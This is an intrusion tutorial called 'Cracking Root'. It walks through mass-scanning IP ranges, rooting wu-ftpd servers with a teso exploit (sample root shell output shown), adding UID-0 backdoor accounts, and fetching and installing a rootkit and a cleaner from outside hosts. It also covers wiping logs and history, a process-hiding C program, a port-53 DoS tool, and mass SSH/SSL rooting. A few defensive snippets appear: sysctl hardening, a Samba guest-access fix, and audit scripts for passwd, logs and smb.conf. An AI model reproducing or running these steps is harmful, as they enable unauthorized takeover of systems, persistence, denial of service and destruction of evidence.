Cracking Root
=======================================================
Tips:
mkdir .bash <---- creates the .bash directory
cd .bash <--- enters the .bash directory
mkdir <directory> <--- creates a new directory
cd <directory> <--- enters the directory you want
cd / <--- leaves a directory
rm -rf <file> <--- deletes a file/directory
1. Stage One
Installing Xpost and ftp
wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz
======================================================
2. Stage Two
cd xpost
cd xwurm/
./scan 213.124
once you have wu-scan.log
./masswu wu-scan.log
When you get the following message
Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...
That means you have obtained root access on IP 213.124.151.113
======================================================
3. Stage Three
Open a new session from your PuTTY SSH client, log back in to your shell,
and go to your ftp directory
cd ftp
./awu 213.124.151.113 (the IP)
if you succeed in getting root access, the following message appears:
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
whoami
root <-- means you currently have root access
======================================================
4. Stage Four
Add your root-access login
--------------------------------------------------------------
1. Method I (not for Red Hat 7.2)
/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampok
passwd rampok
su rampok <<-------- for superuser
2. Method II
if you want root access, type:
/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
after that, type:
passwd crit
wuasu666
Then add a user for your shell login
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X
=======================================================
5. Stage Five
Install a backdoor on your new shell as a safeguard against unwanted eventualities
wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup <desired password> <desired port>
example: --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Don't forget to delete your backdoor files afterwards to remove traces
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
===========================================
6. Stage Six
Erase the traces of your rooting by typing the following commands:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
DONE.....
============================================================
One tip for destroying your shell when it is broken or its login password has been deleted
by the admin, provided you are still inside that shell:
wget http://cyberborneo.b0x.com/xzibit.tar.gz
tar -zxvf xzibit.tar.gz
cd lamerk
./install
cd /
rm -rf lamerk xzibit.tar.gz
============================================================
Some good links for exploit programs, DDoS, sniffing, security tools, etc.
http://www.angelfire.com/de2/sirex3/linux.html
http://www.megspace.com/internet/wet/linux.html
http://www.s0ftpj.org/en/tools.html
http://web.textfiles.com/hacking/
http://www.honeynet.org/scans/
http://www.honeynet.org/scans/scan15/som/som30.txt
http://www.yolinux.com/TUTORIALS/LinuxSecurityTools.html
http://www.attrition.org/mirror/attrition/2000-07.html/
http://www.sans.org/rr/infowar/hacktivism2.php
http://www.antihackertoolkit.com/tools.html
http://www.hackinglinux.co.uk/
http://www.virtro.de/now_inhalt.html
http://packetstormsecurity.nl/misc.html
http://www.ariska.net/
http://www.valisie.com/Vali/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Remedy for tembak.c >> echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Disables packet forwarding
net.ipv4.ip_forward = 0
# Enables source route verification
net.ipv4.conf.all.rp_filter = 1
# Disables automatic defragmentation (needed for masquerading, LVS)
net.ipv4.ip_always_defrag = 1
# Disables the magic-sysrq key
kernel.sysrq = 0
You can get a sample in "blockping.tar.gz"; just extract it and move the files to /usr/bin/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***Running Tembak.c***
./fake bash ./tembak zipey.net 53 (using the hider, without a root login)
./tembak ipaddress 53 or ./tembak zipey.com 53
./tembak zipey.com 53 -->> means hitting zipey.com via port 53
(hit on port 53, it is sure to go down)
./fake real_process fake_process
./fake httpd ./teso -h 202.202.202.202
./fake -bash ./bnc bnc.conf
./fake pico ./eggdrop -m FroGStoNe
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Fake Background, made by buDZ
Greetz to : fabianclone,EF73 and all #betalmostdone and #antihackerlink
/* [ilang.c] The best file for hiding the background process for Eggdrop and BNC. [http://members.tripod.com/alltoolkit] woRdz: d0n't cHangE beL0w thIs liNe , pRivatE stfU CrEatEd bY buDZ <mYnAmE@bOeDi.NeT> */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
char fake[1000]; int main(int argc,char **argv) { if(argc < 3) { exit(0); }
strcpy(fake,argv[1]);strcat(fake,
" "
" "
" ");
execl(argv[2],fake,argv[3],argv[4],argv[5],argv[6],argv[7],argv[8],NULL);
exit(0);}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***Hide BG process***
gcc -o namafile undo1.c
chmod +x namafile
./undo httpd ./eggdrop -m eggdrop.conf
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***Wipe Login User***
(run it with a root login)
upload wipe to the user's directory
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#!/bin/sh
clear
echo "log CLEANING SERVICE - rahul-x"
echo " "
echo "bersih... bersih... "
echo "Removing Files....."
echo " "
rm -f ~root/.bash_history
rm -f /var/log/lastlog
rm -f /var/log/netconf.log
rm -f /var/log/boot.log
rm -f /var/log/messages
rm -f /var/log/secure
rm -f /var/log/xferlog
echo "Creating Files......"
echo " "
touch ~root/.bash_history
touch /var/log/lastlog
touch /var/log/netconf.log
touch /var/log/boot.log
touch /var/log/messages
touch /var/log/secure
touch /var/log/xferlog
echo "Change Mode Files..."
echo " "
chmod 0664 ~root/.bash_history
chmod 0664 /var/log/lastlog
chmod 0664 /var/log/netconf.log
chmod 0664 /var/log/boot.log
chmod 0664 /var/log/messages
chmod 0664 /var/log/secure
chmod 0664 /var/log/xferlog
echo " "
echo "riped riped riped by rahul-x : ... "
echo " viva indonesia "
echo " "
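The cleaner script above, like stage six earlier, leaves a recognisable state behind: zero-byte logs, group-writable modes, a missing lastlog, and a shell history that points at /dev/null. The check below is an added example for defenders, not part of the original post; `check_log_tamper`, `make_sample_tree` and the scratch tree are constructed for illustration, and the log list is the one the script touches.

```shell
#!/bin/sh
# check_log_tamper ROOT: ROOT is a filesystem prefix ("" for the live system,
# or the mount point of a forensic image). Prints "FINDING<TAB>path" lines.
LOGS="lastlog netconf.log boot.log messages secure xferlog"

check_log_tamper() {
    root=$1
    for h in "$root/.bash_history" "$root/root/.bash_history"; do
        # Stage six replaces the history file with a symlink to /dev/null.
        if [ -L "$h" ] && [ "$(readlink "$h")" = "/dev/null" ]; then
            printf 'HISTORY_NULL\t%s\n' "$h"
        elif [ -f "$h" ] && [ ! -s "$h" ]; then
            printf 'EMPTY\t%s\n' "$h"
        fi
    done
    for name in $LOGS; do
        f="$root/var/log/$name"
        if [ ! -e "$f" ]; then
            printf 'MISSING\t%s\n' "$f"
            continue
        fi
        # rm + touch leaves a zero-byte file; a log rotated seconds ago can
        # look the same, so treat this as a lead, not proof.
        [ -s "$f" ] || printf 'EMPTY\t%s\n' "$f"
        # The cleaner script recreates logs with mode 0664 (group-writable).
        [ -z "$(find "$f" -prune -perm -020)" ] || printf 'GROUP_WRITABLE\t%s\n' "$f"
    done
}

# Constructed sample: a scratch tree left in the state described above.
make_sample_tree() {
    mkdir -p "$1/var/log" "$1/root"
    for name in $LOGS; do : > "$1/var/log/$name"; chmod 0664 "$1/var/log/$name"; done
    echo "Jan 28 10:00:01 host syslogd: restart" > "$1/var/log/messages"
    chmod 0600 "$1/var/log/messages"
    rm -f "$1/var/log/lastlog"
    ln -s /dev/null "$1/root/.bash_history"
}

t=$(mktemp -d) && make_sample_tree "$t" && check_log_tamper "$t"
rm -rf "$t"
```

Findings are leads for an investigation; remote syslog copies are what let you confirm what was removed.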
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Closing the Samba hole against the sambal.c attack
To deal with this, there is one very easy technique: edit the smb.conf file.
You just need to find the section
----------------
[netlogon]
comment = Network Logon Service
path = /usr/local/samba/lib/netlogon
guest ok = yes
writable = no
share modes = no
----------------
Then change guest ok = yes to guest ok = no
Next, stop Samba with the command /etc/init.d/smb stop to deactivate the running Samba configuration.
Then start it again with the command /etc/init.d/smb start to load the new configuration.
After making this change, try running the exploit again
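To find every share that still allows guest access, not only [netlogon], the file can be audited before restarting Samba. This is an added example, not part of the original post; `guest_shares` and `sample_smb_conf` are hypothetical names, and the sample file is constructed around the [netlogon] section shown above. It also honours a [global] default and the `public` synonym documented in smb.conf(5).

```shell
#!/bin/sh
# guest_shares FILE: print each share that ends up with guest access enabled.
guest_shares() {
    awk '
        function truthy(v) { v = tolower(v); return v == "yes" || v == "true" || v == "1" }
        /^[ \t]*[;#]/ || /^[ \t]*$/ { next }          # comments and blank lines
        /^[ \t]*\[.*\]/ {                             # section header
            sec = $0; sub(/^[ \t]*\[/, "", sec); sub(/\].*$/, "", sec)
            sec = tolower(sec)
            if (!(sec in known)) { known[sec] = 1; order[++n] = sec }
            next
        }
        {
            eq = index($0, "="); if (!eq || sec == "") next
            key = tolower(substr($0, 1, eq - 1)); gsub(/[ \t]/, "", key)
            val = substr($0, eq + 1); gsub(/^[ \t]+|[ \t]+$/, "", val)
            # smb.conf(5): "public" is a synonym for "guest ok"
            if (key == "guestok" || key == "public") guest[sec] = truthy(val) ? "yes" : "no"
        }
        END {
            dflt = ("global" in guest) ? guest["global"] : "no"
            for (i = 1; i <= n; i++) {
                s = order[i]; if (s == "global") continue
                if (((s in guest) ? guest[s] : dflt) == "yes") print s
            }
        }
    ' "$1"
}

# Constructed sample configuration (only [netlogon] comes from the page).
sample_smb_conf() {
cat <<'EOF'
[global]
   workgroup = EXAMPLE
; guest ok = yes
[netlogon]
   path = /usr/local/samba/lib/netlogon
   guest ok = yes
[private]
   Guest OK = No
[scans]
   public = Yes
EOF
}

c=$(mktemp) && sample_smb_conf > "$c" && guest_shares "$c"
rm -f "$c"
```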
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
cat /etc/passwd
copy and paste it into Notepad
look for the entries ending in bash <<= these can be made root again
look at the ones with numeric fields => :x::255::255:
change the one in the middle to 0
then remember which user it was that you changed to 0
cat > /etc/passwd
press Enter
then paste it back
then press Control-D
then press Control-C
check whether it worked, whether the 255 changed to 0
passwd user <<= remember the name of the user whose 255 you changed to 0
then, once that is done, log in and su
go straight to cd /lib/security
create a directory pam_res.so
cd pam_res.so
wget the cleaner there
inside pam_res.so
it must not be anyone other than root
you have to change the username to root
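Both the `useradd ... -u 0` commands in stage four and the /etc/passwd edit above leave the same artefact: an account other than root whose UID field is 0, often with a home directory under /etc. The audit below is an added example for defenders, not part of the original post; `audit_passwd` and `sample_passwd` are hypothetical names and the sample entries are constructed to mirror the accounts the page creates.

```shell
#!/bin/sh
# audit_passwd FILE: flag passwd(5) entries matching the artefacts described
# above. Output: one "REASON<TAB>user" line per finding.
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }                       # skip comments and blanks
        # A file rewritten by hand can lose the seven-field layout.
        NF != 7 { print "MALFORMED\t" $1; next }
        # Any name other than root with UID 0 is a second superuser.
        $3 == 0 && $1 != "root" { print "UID0\t" $1 }
        # Empty password field: login without a password.
        $2 == "" { print "EMPTY_PW\t" $1 }
        # Interactive shell with a home directory hidden under /etc.
        $6 ~ /^\/etc(\/|$)/ && $7 ~ /sh$/ { print "HOME_IN_ETC\t" $1 }
    ' "$1"
}

# Constructed sample mirroring the accounts created in stage four.
sample_passwd() {
cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
rampok:x:0:0::/:/bin/bash
crit:x:0:0::/etc/crit:/bin/bash
html:x:501:10::/etc/html:/bin/bash
EOF
}

p=$(mktemp) && sample_passwd > "$p" && audit_passwd "$p"
rm -f "$p"
```

On a live host, run `audit_passwd /etc/passwd` and compare the result with a known-good copy from backup or configuration management.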
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
openBSD:
wget http://packetstorm.decepticons.org/crypt/ssh/openssh/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.4p1.tar.gz
wget www.renjana.com/sshutup-theo.tar.gz
tar -zxvf sshutup-theo.tar.gz
ls -al sshutuptheo
cd openssh-3.4p1
patch < ssh.diff
./configure
make ssh
./ssh -l root IP e.g.: ./ssh -l root shah.koptevo.net
http://www.netcraft.com/whats/?host=www.t-mems.com.tw
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rooting SSH on LINUX, port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port e.g.: ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- mass SSH scan
./r00t 203.20 -d 2 <--- mass FTP scan
./r00t 203.20 -d 3 <--- mass FTP scan
./r00t 134.7. -d 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rooting with massaphace:
./massossl 200 443 160
meaning
scan IP 200.160
port 443
do not change port 443, though the IP may be changed
from IP 1 - 254
except 192.x.x.x and 10.x.x.x IPs, which cannot be scanned, because they are intranet IPs
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tuesday, January 28, 2014